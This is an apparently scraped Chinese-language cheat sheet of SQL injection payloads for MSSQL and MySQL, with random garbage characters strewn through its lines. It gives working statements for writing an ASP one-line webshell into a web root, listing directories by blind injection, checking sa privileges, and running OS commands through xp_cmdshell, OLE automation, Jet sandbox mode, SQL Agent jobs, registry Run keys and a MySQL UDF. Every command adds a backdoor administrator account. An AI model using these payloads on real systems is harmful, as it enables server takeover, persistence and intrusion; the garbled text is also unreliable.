MSSQL语句导出一句话木马! \1 a+ W+ e8 ^" @1 h e; W
首先确定网站的WEB路径
. Z8 d, z- `- ]2 Z, j S r;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
3 M' q- G$ d7 L. e+ H7 ~
/ ^' z; ]; h2 ]1 I) P;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
+ Q9 p$ Q3 Z# u& q" V* j//将一句话木马插入表中
% R) b$ L0 u: x1 z$ ^
' f& [# J: g2 E% H6 x# N;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 3 m9 g' r5 g# r+ m) w D
//导出一个ASP文件
& M# j! Z3 z% H; N
$ b3 f9 B. d- d& J" _8 T: C
; ~# F9 E6 M6 p w6 Q关于MSSQL列目录
2 Z" N2 G3 @! s4 K! O' q;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表/ j" A! f% s/ s- l$ ]/ U0 c
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
h' j; i1 `& k0 Q% u" y& g7 E5 @
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
! j. }; K5 `7 {
5 Q q4 G5 L& J \And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
! ~% t# M, m( f' j7 s3 U- |6 H; [, e' z) ]) A. P
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符1 c8 N) I; j0 u) ~9 D
9 B2 r/ j# i B1 x# |8 U
, u B! F! h- _
数据库版本和权限查看$ ~2 @. i& |7 C2 `! u# x- Q: R
and 1=(select @@VERSION) //查看详细的数据库信息.4 _4 z) R& B9 _% ^" g; X
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
) v/ o2 T* {6 e, ]( z! aand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER, W1 m3 O9 ~, r! T4 q# H7 J) U4 ^. Z2 ~
9 N( x' M. n$ M. n7 q, n
8 K* P5 \1 x" u5 w2 l0 \; O
1.利用xp_cmdshell执行命令
. l R& R; l/ w- w( q5 M: G% p" I! y% \exec master..xp_cmdshell 'net user rfire 123456 /add'
" {# g$ x1 K! l6 fexec master..xp_cmdshell 'net localgroup administrators rfire /add'! M9 _, E, m, ]) E6 b# J
! N9 U. _: X( K; f1 d$ n
恢复xp_cmdshell存储过程7 Z# F3 n k Q7 \* d' W( p
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'! T; @, `# h1 E6 z h
: Y3 v4 d& s' H: v; X
. e) C- s2 l3 ] g2.利用SP_OAcreate和SP_OAMETHOD执行命令$ Q3 h/ @: t3 x8 _" k5 h
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下( j- g% d+ Z3 l4 v9 K) C" e" E+ t
DECLARE @shell INT //建立一个@shell实体! [( x7 s5 t1 [- A% n( o C
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例( [. |- ?9 D) }$ G; @
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
% _/ c9 h* \7 I# B& B$ L ^) c2 X! F3 j8 T$ B% C: e8 N' c
& h$ Y' I2 V. Y9 b2 K
3.利用沙盒模式3 @% K8 t$ S8 O
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。. X u! [2 [; w8 B0 Y: o9 {5 E3 L
开启沙盒模式:
+ y$ f r1 f i! gEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
; x' u: g0 m2 r$ `+ K, z4 r. {! \' ?% Q# [
执行命令:! F5 S$ E6 z1 [, o4 _* o8 y
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');* X; F6 B9 w2 C. w, l3 N, `7 B
* R2 A* ?0 ^! P$ H
3 x/ ^( o0 I( V2 @- t
4.利用SQL代理执行命令7 u" B& i0 O, y( C2 X
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务6 i/ S" _+ L4 V
9 O `2 W* x$ T- c8 t3 Z7 I执行命令:
( u+ G1 E3 d$ v" E0 C. G3 H; cuse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
" E; M, O" y1 h$ Z* `& c; k9 mexec sp_add_job 'x'
; u: Z9 {: t, B$ L J" H; fexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业% Q1 [/ k1 N" t, ]" n" s
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业) L. [5 b* C5 {4 E
: `* m2 z% H8 f* H+ e
7 `& r: M! o, G) [. g( @5 I" w5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项). S7 p: G x8 b
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
/ N' k9 A# C: B, ~7 n" D: e2 C. N: U, }
# W* K! {2 H0 N- t3 g) ~6 R7 c! y6.MYSQL的命令执行! k. F2 p, X$ Q' U$ U' g7 S5 A
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
. C4 E, l8 E# |1 t+ L首先要在su.php下导出c:\windows\udf.dll! E$ r- o! j. {3 \3 @
导出后执行创建自定义函数命令:8 I- ]3 G* e1 t z3 V
Create Function cmdshell returns string soname 'udf.dll'% }8 a4 `% ^7 b
执行命令
" ?% D ~/ e! [0 I# P. ^9 Pselect cmdshell('net user rfire 123456 /add')* h) C9 @, |, X/ [' A6 w
执行后删除函数 drop function cmdshell
* f, e$ O" K/ f7 ` C1 ~8 s$ v |